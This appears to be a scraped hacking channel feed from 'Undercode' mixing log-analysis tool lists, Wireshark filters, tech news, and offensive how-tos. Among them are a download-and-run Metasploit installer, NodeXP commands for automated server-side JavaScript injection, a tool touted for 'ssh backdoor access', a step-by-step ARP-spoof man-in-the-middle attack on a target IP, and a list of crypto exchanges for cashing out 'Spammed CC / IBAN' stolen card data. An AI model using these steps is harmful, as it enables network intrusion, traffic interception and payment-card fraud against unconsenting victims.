▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Log #Analysis #Tools 2020

[AppCompatProcessor](https://github.com/mbevilacqua/appcompatprocessor) - AppCompatProcessor has been designed to extract additional value from enterprise-wide AppCompat / AmCache data beyond the classic stacking and grepping techniques.

Lorg - Tool for advanced HTTPD logfile security analysis and forensics.

[Logdissect](https://github.com/dogoncouch/logdissect) - CLI utility and Python API for analyzing log files and other data.

Sigma - Generic signature format for SIEM systems already containing an extensive ruleset.

[StreamAlert](https://github.com/airbnb/streamalert) - Serverless, real-time log data analysis framework, capable of ingesting custom data sources and triggering alerts using user-defined logic.

SysmonSearch - SysmonSearch makes Windows event log analysis more effective and less time consuming by aggregation of event logs.

✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑German court ruled that Facebook is required to comply with the regulatory order: restrict its collection of user data
#News

> The German Federal Court ruled on Tuesday that Facebook must comply with an order issued by the German antitrust regulator to restrict the collection of user data, which was a setback for the company. The Federal Court issued a stay of execution order, suspending a lower court ruling in support of the Federal Cartel Office’s original view that Facebook abused its market dominance and collected users without permission. information.

>"I am happy with this ruling." Andreas Mundt, chairman of the Federal Cartel Office, said that the reason was that it "if data is collected and used illegally, it should be possible to take antitrust actions to prevent Market power is abused."

>Facebook said there is no direct relationship between this latest ruling and the appeal process that is continuing. The company said: "We will continue to defend our position that we are not engaged in antitrust abuse. For German individuals or companies using our products and services, there will be no immediate changes."

>Germany has been at the forefront of the global boycott of Facebook, and the company is facing increasing criticism that its platform is used to spread false information about politics.

>The German Federal Court stated in its ruling that it did not object to the conclusion of the cartel office that Facebook abused its market dominance and that the company’s use of data was not fully approved by users.


@UndercodeNews
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑#FastTip best App Repackaging Detectors 2020

>FSquaDRA - a tool for detection of repackaged Android applications based on app resources hash comparison.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑some Termux Commands List 2 :

1️⃣Display text in a different style

> apt install figlet

> figlet anyword

You will get the text in a different style.

2️⃣See Matrix background animation on Termux

> apt install cmatrix

> cmatrix + ENTER

3️⃣Find factors of a number

> pkg install coreutils

> factor 1337

4️⃣Go to the friendly interactive shell, fish

> apt install fish

> fish+ENTER

> Fish command autocompletes the commands. Type exit to go out.

5️⃣To see text in colorful style

> apt install toilet

> toilet -f mono12 -F green BugBounty

6️⃣To open any site in termux

> apt install w3m

> w3m google.com

7️⃣Installing Metasploit in Termux

> First, install curl

> pkg install curl

after that:

> curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh

> Get access permission

chmod 777 metasploit.sh

> ./metasploit.sh

Enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Wireshark Filters for TCP/UPD COMMANDS
#FastTips :


1️⃣To see only TCP traffic:

Show traffic whose source or destination port is a specific port, for example 8080:

tcp.port==8080

2️⃣Show traffic originating from port 80:


tcp.srcport == 80

> Show traffic sent to a service listening on port 80:
tcp.dstport == 80

3️⃣Show TCP packets with SYN flag enabled:

tcp.flags.syn==1
> Show TCP packets with the SYN flag enabled and the ACK flag disabled:


tcp.flags.syn==1 && tcp.flags.ack==0

4️⃣Similarly for other flags:


tcp.flags.syn==1

tcp.flags.ack==1

> Rst

tcp.flags.reset==1

> Fin
tcp.flags.fin==1

> Cwr

tcp.flags.cwr==1

> ECE

tcp.flags.ecn==1

> Urg

tcp.flags.urg==1

> PSH

tcp.flags.push==1

> NS

tcp.flags.ns==1

5️⃣You can also use syntax of the form tcp.flags == 0x0XX , for example:

FIN is tcp.flags == 0x001
SYN is tcp.flags == 0x002
RST is tcp.flags == 0x004
ACK is tcp.flags == 0x010
ACK and FIN installed at the same time are tcp.flags == 0x011
ACK and SYN installed at the same time are tcp.flags == 0x012
ACK and RST installed at the same time are tcp.flags == 0x014

6️⃣Header Length (Data Offset):

tcp.hdr_len == 32<font></font>
tcp.hdr_len == 52<font></font>
tcp.hdr_len > 32


7️⃣Packets with reserved bits set:

tcp.flags.res == 1

8️⃣Window size:

tcp.window_size_value == 11<font></font>
tcp.window_size_value == 4468<font></font>
tcp.window_size_value > 65000<font></font>
tcp.window_size_value < 100

9️⃣Calculated window size:


tcp.window_size == 45056<font></font>
tcp.window_size == 11

Enjoy❤️👍🏻
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 new Detection and Exploitation Tool for Node.js Services!
NodeXP is an intergrated tool, written in Python 2.7, capable of detecting possible vulnerabilities on Node.js services as well as exploiting them in an automated way, based on S(erver)S(ide)J(avascript)I(njection) attack!

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone git clone https://github.com/esmog/nodexp.git

2️⃣cd nodexp

3️⃣To get a list of all options run:

> python2.7 nodexp -h

4️⃣To get a list of all options run:

> python2.7 nodexp -h

5️⃣Examples for POST and GET cases accordingly:

> python2.7 nodexp.py --url="http://nodegoat.herokuapp.com/contributions" --pdata="preTax=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA"
python2.7 nodexp.py --url="http://nodegoat.herokuapp.com/contributions" --pdata="preTax=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA" --tech=blind

» python2.7 nodexp.py --url="http://192.168.64.30/?name=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA"
python2.7 nodexp.py --url="http://192.168.64.30/?name=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA" --tech=blind


Enjoy ❤️👍🏻
✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automate your termux work
-txtool is made to help you for easly pentesting in termux,

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣$ git clone https://github.com/kuburan/txtool.git

2️⃣$ cd txtool

3️⃣$ apt install python2

4️⃣$ ./install.py

5️⃣$ txtool

6️⃣for ssh backdoor access, txtool used paramiko python library that required PyNacl if you have an error installing PyNacl, follow my steps:

> $ apt-get install --assume-yes libsodium libsodium-dev

> $ SODIUM_INSTALL=system pip2 install pynacl

7️⃣choose options via numb

Enjoy❤️👍🏻
✅Topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Popular free gift card websites :

🧜‍♂️https://www.oneopinion.com
🧜‍♂️https://dollarsprout.go2cloud.org/aff_c?offer_id=36&aff_id=2&aff_sub=earn-free-gift-cards
🧜‍♂️https://www.thecardcloset.com/
🧜‍♂️https://www.cdkeys.com/
🧜‍♂️https://www.offgamers.com/
🧜‍♂️https://www.giftcardmall.com/
🧜‍♂️https://www.egifter.com/
🧜‍♂️https://www.carddelivery.com/
🧜‍♂️https://www.igp.com/
🧜‍♂️https://www.pcgamesupply.com/
🧜‍♂️https://www.mygiftcardsupply.com/
🧜‍♂️https://www.woohoo.in/
🧜‍♂️https://www.g2a.com/
🧜‍♂️https://www.giftinix.com/
🧜‍♂️https://www.giftcards.com/
🧜‍♂️https://www.cardcash.com/
🧜‍♂️https://joinhoney.com/ref/qedtrpr

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Best BTC buying pages use Spammed CC / IBAN
Áll documents and
other security protocols required

Coinmama.com
cex.io
coinbase.com
Bitpanda.com
pro.coinbase.com
bitstamp.net
Kraken.com
blockchain.com
bitcoin.com

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Chrome malicious extension steals personal data and has been downloaded over 30 million times
#News !!!

> Google’s Chrome Web Store was hit by the largest surveillance activity to date. As of May 2020, the campaign successfully stolen data from users worldwide by downloading malicious extensions more than 32 million times.

> Awake's security threat research team released a research report stating that it discovered a large-scale global surveillance campaign that used the nature of Internet domain registration and browser capabilities to monitor and steal from multiple regions and industry segments User data. Research shows that this criminal activity is promoted by a single Internet domain registrar: CommuniGal Communication Ltd. (GalComm).

> And said that by using the trust as a domain name registrar, GalComm has enabled malicious activity, and the malicious activity has been found in more than one hundred networks inspected. In addition, even in complex organizations that have invested heavily in cybersecurity, malicious activities can be hidden by bypassing multiple layers of security controls.

> Awake pointed out in the report that there are 26,079 accessible domains registered through GalComm, of which more than 15,000 domains are malicious or suspicious.

> In the past three months alone, it has collected 111 malicious or forged Chrome extensions using GalComm domains, which are used for attacker's command and control infrastructure and/or as loader pages for extensions. These extensions can take screenshots, read the clipboard, get credential tokens stored in cookies or parameters, and get user keystrokes (such as passwords).

🦑Examples of tricks to install malicious Chrome extensions

> As of May 2020, the number of downloads of these 111 malicious extensions has reached 32,962,951 times. Awake said the company has partnered with Google to remove these extensions from the Chrome Web Store.

In response to this, Moshe Fogel, the person in charge of GalComm, stated in a communication with Reuters, “GalСomm is not involved in any malicious activities. It can be said that on the contrary, we cooperate with law enforcement and security agencies to do our best to prevent them.” After Awake Security published a report and listed all suspicious domain names, Moshe Fogel also said that the use of these domain names was almost inactive and would continue to investigate other domain names.

@UNdercodeNews
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑MITM ATTACK VIA TERMUX BEST WAY 2020 :

? man-in-the-middle attack (MITM),
> also known as a hijack attack is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other. One example of a MITM attack is active eavesdropping, in which the attacker makes independent connections with the victims and relays messages between them to make them believe they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker

WELL HOW TO DO ?

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣$ git clone https://github.com/websploit/websploit.git

2️⃣$ cd websploit

3️⃣$ python setup.py install

4️⃣Select module :

wsf > use arp_spoof
with options command you can see options of current module:

wsf > arp_spoof > options
Change options with set command:

wsf > arp_spoof > set target 192.168.1.24
Finally run module via execute command:

wsf > arp_spoof > execute

🦑STILL GE TROUBLE ?

CHECK THIS VID : https://www.youtube.com/watch?v=hqbi86I6KhU

Share us❤️👍🏻
✅Topic sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁